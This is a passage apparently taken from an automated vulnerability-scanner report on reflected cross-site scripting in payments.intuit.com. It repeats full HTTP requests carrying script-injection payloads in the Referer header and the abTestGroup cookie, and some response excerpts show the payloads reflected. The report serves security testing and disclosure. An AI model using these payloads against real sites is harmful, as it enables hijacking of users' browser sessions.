Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16;
Referer: http://www.google.com/search?hl=en&q=6ecbd'-alert(1)-'a54af6c28ec
Response
...[SNIP]...
// This is assigning the ipsRefer to a variable to capture the referring domain when redirects occure
var testReferDomain="0";
var eVar17Value = 'http://www.google.com/search?hl=en&q=6ecbd'-alert(1)-'a54af6c28ec';
</script>
...[SNIP]...
The value of the Referer HTTP header is copied into an HTML comment. The payload 38485--><script>alert(1)</script>074023fb5c0 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /products/quickbooks-payment-solutions/web-credit-card-processing.jsp HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16;
Referer: http://www.google.com/search?hl=en&q=38485--><script>alert(1)</script>074023fb5c0
The value of the Referer HTTP header is copied into an HTML comment. The payload 8809e--><script>alert(1)</script>275e11ad70b was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /support/ HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16;
Referer: http://www.google.com/search?hl=en&q=8809e--><script>alert(1)</script>275e11ad70b
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload dceb5'-alert(1)-'94b519c31b1 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /support/ HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16;
Referer: http://www.google.com/search?hl=en&q=dceb5'-alert(1)-'94b519c31b1
Response
...[SNIP]...
// This is assigning the ipsRefer to a variable to capture the referring domain when redirects occure
var testReferDomain="0";
var eVar17Value = 'http://www.google.com/search?hl=en&q=dceb5'-alert(1)-'94b519c31b1';
</script>
...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ef888'-alert(1)-'bf789d01126 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /support/glossary.jsp HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16;
Referer: http://www.google.com/search?hl=en&q=ef888'-alert(1)-'bf789d01126
Response
...[SNIP]...
// This is assigning the ipsRefer to a variable to capture the referring domain when redirects occure
var testReferDomain="0";
var eVar17Value = 'http://www.google.com/search?hl=en&q=ef888'-alert(1)-'bf789d01126';
</script>
...[SNIP]...
The value of the Referer HTTP header is copied into an HTML comment. The payload 93b01--><script>alert(1)</script>d9ed33811bf was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /support/glossary.jsp HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16;
Referer: http://www.google.com/search?hl=en&q=93b01--><script>alert(1)</script>d9ed33811bf
The value of the abTestGroup cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 262dd"><script>alert(1)</script>f39fea87c00 was submitted in the abTestGroup cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /?launchHelpMeChoose=true HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16262dd"><script>alert(1)</script>f39fea87c00;
The value of the abTestGroup cookie is copied into the HTML document as plain text between tags. The payload 54b80<script>alert(1)</script>618aff7c52b was submitted in the abTestGroup cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /?launchHelpMeChoose=true HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T1654b80<script>alert(1)</script>618aff7c52b;
The value of the abTestGroup cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e3bfc"><script>alert(1)</script>2691f2a62ad was submitted in the abTestGroup cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /apply-now/ HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16e3bfc"><script>alert(1)</script>2691f2a62ad;
The value of the abTestGroup cookie is copied into the HTML document as plain text between tags. The payload b8e7d<script>alert(1)</script>1a9cb1ed9ff was submitted in the abTestGroup cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /apply-now/ HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16b8e7d<script>alert(1)</script>1a9cb1ed9ff;
The value of the abTestGroup cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d50dd"><script>alert(1)</script>0da146df87f was submitted in the abTestGroup cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /apply-now/check-warranty-apply-now.jsp HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16d50dd"><script>alert(1)</script>0da146df87f;
The value of the abTestGroup cookie is copied into the HTML document as plain text between tags. The payload 5bab0<script>alert(1)</script>ddd1b3cb4d0 was submitted in the abTestGroup cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /apply-now/check-warranty-apply-now.jsp HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T165bab0<script>alert(1)</script>ddd1b3cb4d0;
The value of the abTestGroup cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 985ed"><script>alert(1)</script>23bad0dfc93 was submitted in the abTestGroup cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /apply-now/contact-me.jsp HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; 